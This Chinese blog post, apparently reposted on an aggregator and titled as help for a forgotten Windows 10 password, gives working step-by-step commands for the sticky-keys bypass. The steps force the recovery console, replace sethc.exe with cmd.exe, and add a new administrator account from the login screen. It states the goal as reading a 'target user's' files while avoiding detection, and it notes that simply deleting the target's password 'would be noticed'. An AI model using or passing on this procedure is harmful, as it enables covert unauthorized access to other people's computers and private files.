admin管理员组文章数量:1567833
一,目标
能拿到目标用户的文件夹和其他内容
二、思路
DOS命令改不了密码,所以只能添加一个新的用户,通过新添加的用户可以修改已有用户的密码。只需要一双手即可。
1,利用漏洞,将cmd.exe替换成sethc.exe
2,利用快捷键打开cmd.exe创建一个新用户
三、步骤
3-1:先要进入一个类似cmd的页面
在下面的页面按下强制关机,重复多次,一定要注意:不能进到登陆界面。直到界面出现:正准备自动修复。这个不用担心,是人为的,电脑没出事没事情。
等待一会,会出现下面界面
选择 高级选项
选择 疑难解答
选择 高级选项
选择 命令提示符
会出现一个类似cmd的对话框
3-2:开始将cmd.exe替换成sethc.exe
输入
diskpart
list volume
exit
这个操作是为了查看,哪个是系统盘,我这里是C盘,结果如下图
开始替换,输入
我是c盘,所以输入"C:",你要是D盘,就"D:"。看图片
C:
cd Windows
cd System32
将sethc.exe重命名成123456.exe(为了将sethc.exe保存一下)
ren sethc.exe 123456.exe
将cmd.exe拷贝一份,并重命名为sethc.exe(记住是copy)
copy cmd.exe sethc.exe
3-3:利用漏洞进入cmd
重启电脑
在用户登录页面,连续按shift,(大概6,7次)直到出现下面cmd框:
如果没有弹出来,请把这个打开,在右下角
3-4:创建新用户“AAA”,并授权限
输入
net user AAA /add
net localgroup Administrators AAA /add
重启
发现,左下角有个新用户“AAA”,点击登录(无密码)
成功进入
3-5:成功!看看结果
其他盘里面的文件都可以看
可以进入目标用户的用户文件,里面的文件都可以看到
四、总结
1,直接删除目标用户密码,会被发现
2,该方法是通过利用漏洞,创建一个新的管理员,进而对目标用户的文件进行读取
3,无需U盘的工具,大部分win10都可以成功
版权声明:本文标题:win10密码忘记怎么办(无工具的情况下,纯技术) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1726375606a1067778.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论